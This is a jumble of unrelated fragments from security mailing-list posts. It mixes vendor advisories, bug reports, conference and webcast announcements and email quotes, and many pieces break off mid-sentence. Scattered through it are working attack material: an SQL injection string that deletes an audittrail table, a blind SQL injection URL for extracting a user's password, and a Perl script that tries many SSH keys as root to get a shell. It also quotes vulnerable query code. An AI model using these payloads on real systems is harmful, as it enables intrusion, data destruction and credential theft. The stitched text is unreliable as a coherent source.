However if I send a url something where the action is
generate_tax_report and db contains arbitrary SQL code I should be
able to cause that to execute in the database in the query in RP.pm
beginning in line 1935. Whatever $form->{db} is gets directly
interpolated in and there is no whitelisting to ensure it is always
'ar' or 'ap.' The line where this occurs is 1941, and it reads JOIN
$form->{db} a ON (a.id = ac.trans_id)
So if the query string includes the url encoded equivalent of &db=ar a
join customer n on ar.id=customer.id; delete from audittrail; select *
from ar a join acc_trans ac on ar.id = ac.trans_id
To fully understand these bug descriptions, you'll need some knowledge of IRC
and ircu-specific features like how timestamps (TS) work.
Some of these vulnerabilities only affect servers with oplevels or zannels
enabled, which was the default (but not anymore). Oplevels (A/Upass) is a
feature that allows the creator of a new channel to set passwords on it that,
when used to join, automatically give ops. Zannels is a feature introduced in
2.10.12.02 that keeps empty channels alive for a while instead of destroying
them immediately, to avoid A/U passwords being set on a channel that was only
empty for a short time.
Zannels was enabled on Undernet on some servers for a short time and then
disabled because of the trouble it caused. Oplevels never were enabled.
allows a service provider to offer multicast services to MPLS VPN
customers.
A vulnerability exists in the implementation of MVPN that allows an
attacker to send specially crafted Multicast Distribution Tree (MDT)
Data Join messages that can cause the creation of extra multicast
states on the core routers. MDT Data Join messages can be sent in
unicast or multicast. The vulnerability can also allow leaking
multicast traffic from different MPLS VPNs. It is possible to receive
multicast traffic from VPNs that are not connected to the same
Provider Edge (PE) router. In order to successfully exploit this
Meeting Manager contains a buffer overflow vulnerability that may
result in a denial of service or remote code execution. The WebEx
Meeting Manager is a client-side program that is provided by the
Cisco WebEx meeting service. The Cisco WebEx meeting service
automatically downloads, installs, and configures Meeting Manager the
first time a user begins or joins a meeting.
When users connect to the WebEx meeting service, the WebEx Meeting
Manager is automatically upgraded to the latest version. There is a
manual workaround available for users who are not able to connect to
the WebEx meeting service.
Application : E-Friends
version : <= 4.98
Vendor : http://www.alstrasoft.com/efriends.htm
Description :
E-Friends is an online social networking script that allows you to start your own profitable community just like the Friendster and MySpace social networking sites, plus the ability to offer paid membership subscriptions. E-Friends allows members to connect to people in their personal networks and make friends, match making, dating, blogging and join groups and events. Features include email importer, messaging system, classifieds, join groups, forums, affiliate program integrated, online chat, personal blog, calendar, custom profile URL, friends search, invite friends, hotornot image ranking, advanced admin control panel, upload photos and many more.
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
> I'm sorry you're frustrated. There are a lot of ways you can change the
> direction of ISC development. Firstly, you can submit source code - we like that
> one especially. Secondly, you can fund development, and have us develop code
> that you need or want done. Thirdly, you can join the BIND Forum and give us
> recommendations and feedback there. Or fourth, you can simply ask us.
Well, under normal circumstances I might consider contributing code or
helping you get your collective security act together. However, other
ethically-questionable practices that the ISC engages in pretty much
Well, finest might be stretching it. However, at the very least, it'll be
more fun than getting your dags trimmed by a hungover dude in a black singlet.
We invite you, our herd, our fellow fleece growers, gathers and pullers, to
join us:
-----[ THE IMPLEMENTATION, V4.0
Kiwicon IV will be held at the same venue as previous Kiwicons, Victoria
University, Wellington, New Zealand on the weekend 27-28th November 2010.
> ./icebb.php, line 169
$icebb->client_ip = $input['ICEBB_USER_IP'];
> ./admin/index.php, line 112
$icebb->adsess = $db->fetch_result("SELECT adsess.*,u.id as userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE adsess.asid='{$icebb->input['s']}' AND adsess.ip='{$icebb->client_ip}' LIMIT 1");
A hacker could exploit this security breach in order to alter a SQL request.
[|Exploit:|]
http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php
code.
The vectors for this attack include all the major browsers and Flash. In
co-operation with Adobe, the discoverers delayed public discussion to allow
a patch to be created. In the intervening time, other researchers have made
partial disclosures, but this is your chance to join co-discoverer Jeremiah
Grossman for a Black Hat webcast that deals with the attack from all sides.
Bring your questions - we'll have a Q&A session after the presentation.
Black Hat Japan is in the books and we're already looking forward to the
Washington DC and Europe events. If you missed Black Hat Tokyo, we have put
Vote for DotDotPwn as tool for next BackTrack release!! ->
http://www.backtrack-linux.org/forums/tool-requests/32082-dotdotpwn.html
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
CSCsk46770 and has been assigned the CVE identifier CVE-2008-1744.
SIP-Related Vulnerabilities
Cisco Unified Communications Manager versions 5.x and 6.x contain a
vulnerability in the handling of malformed SIP JOIN messages that may
result in a DoS condition. SIP processing cannot be disabled in Cisco
Unified Communications Manager. There is no workaround for this
vulnerability. This vulnerability is fixed in Cisco Unified
Communications Manager versions 5.1(2) and 6.1(1). This vulnerability
is documented in Cisco Bug ID CSCsi48115 and has been assigned the
- Sergey Gordeychik
http://www.webappsec.org/ The Web Application Security Consortium
Regards,
- WASC Announcements
-----------------------------[source code start]-------------------------------
jmodonly();
...
$res=mysql_query("SELECT users.username, requests.filled, requests.filledby,
requests.id, requests.userid, requests.request, requests.added, categories.name
as cat FROM requests inner join categories on requests.cat = categories.id
inner join users on requests.userid = users.id
$categ order by requests.request $limit") or print(mysql_error());
-----------------------------[source code end]---------------------------------
Test:
/done
Disconnecting..-done
Once the database is downloaded, contacts can be queried with SQL:
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
…
the evidence. Orablock can also be used to locate "stale" data - i.e. data
that has been deleted or updated. It can also be used to dump SCNs for data
blocks which can be useful during the examination of a compromised Oracle
box."
Please join us to learn about Oracle DB forensics from one of the innovators
of the field, as well as learn about his new tool and to get your questions
answered. The webcast will be held on December 18 at 1pm PST. The URL for
registration is:
http://w.on24.com/r.htm?e=122240&s=1&k=57F93C9128D5D1BBC64B8AE7177FB981
>
> http://www.procheckup.com/Vulnerability_PR08-20.php
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
$first = 1;
// Get the messages to be merged
$query = $db->query("
SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts
FROM ".TABLE_PREFIX."posts p
LEFT JOIN ".TABLE_PREFIX."forums f ON (f.fid=p.fid)
WHERE p.tid='$tid' AND p.pid IN($pidin)
ORDER BY dateline ASC
");
-------------------------------------------------------------------------------
# Vulnerability Info:
# Type: Sql/Xss
# Risk: Medium
#===========================================================
# Sql Injection:
# http://site.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*
#
# Xss:
# http://site.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]
#===========================================================
#################################################################
------------------
C] easy IP banning
------------------
This is a problem that has affected Soldat for a long time; in fact the bug is
just the lack of a real check on the players who join the server:
in short, a single UDP packet is enough to get inside it.
While in the past the banning happened with malformed packets (I wrote
a PoC for it), in recent versions it is possible to exploit this
problem by sending multiple join packets, causing a 20-minute ban
for the source IP address.
damages so the foregoing limitation may not apply.
Hi Folks,
If you are interested in web attacks and stealth hacking, come and join
us at HITBSecConf Dubai [
http://conference.hackinthebox.org/hitbsecconf2010dxb/?page_id=680 ].
Next 21st April, TEHTRI-Security will talk about web security, during
this presentation: "Silent Steps: Improving the Stealthiness of Web
Hacking".
--
Michael Scheidell, CTO
Join SECNAP at SecureWorld Detroit 8-9
http://www.secnap.com/events for free and discounted seminar tickets